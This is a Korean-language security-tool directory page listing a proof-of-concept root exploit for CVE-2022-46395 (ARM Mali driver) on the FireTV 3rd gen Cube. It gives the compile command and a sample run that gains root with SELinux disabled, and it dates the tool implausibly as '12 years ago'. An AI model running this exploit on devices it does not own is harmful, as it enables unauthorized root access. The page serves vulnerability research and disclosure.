Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE_2022_46395_Gazelle — CVE-2022-46395 FireTV 3rd gen Cube (gazelle)용 POC | Kitploit
도구/GitHubGitHub/pro-me3us/cve_2022_46395_gazelle
Android SecurityEmbedded Systems SecurityPrivilege EscalationExploitationBinary Exploitation
GitHubpro-me3us/cve_2022_46395_gazelle

CVE_2022_46395_Gazelle

CVE-2022-46395 FireTV 3rd gen Cube (gazelle)용 POC

저장소 보기
12년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

FireTV 3세대 Cube에서 실행되는 CVE-2022-46395 익스플로잇

이것은 보안 연구원 Man Yue Mo의 Pixel 6 POC를 CVE-2022-46395용으로 포크한 것입니다. 취약점에 대한 자세한 설명은 여기에서 읽을 수 있습니다. FireOS의 32비트 사용자 공간을 고려하여 변경되었습니다. 이 POC는 ARM Mali 커널 드라이버의 버그를 악용하여 임의 커널 코드 실행을 얻은 다음, SELinux를 비활성화하고 루트 권한을 획득합니다.

이 익스플로잇은 PS7664/3772(2023년 9월)에서 패치되었습니다. 참고로, ndk-21에서 clang으로 컴파일할 때 다음 명령이 사용되었습니다:

root@kitploit:~
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o gazelle_buf

가장 빠른 결과를 위해 재부팅 후 바로 실행하세요. 평균적으로 POC는 20~60초 내에 루트 권한을 얻습니다.

root@kitploit:~
gazelle:/ $ /data/local/tmp/gazelle_buf
fingerprint: Amazon/gazelle/gazelle:9/PS7652.3564N/0028488625152:user/amz-p,release-keys
benchmark_time 102
failed after 100
finished reset: 919423975 fault: 918468559 3795 err 0 read 3
found pgd at page 8
overwrite addr : 104100558 558
overwrite addr : 104300558 558
overwrite addr : 10410082c 82c
overwrite addr : 10430082c 82c
result 50
success after 128
gazelle:/ # 
도구 다운로드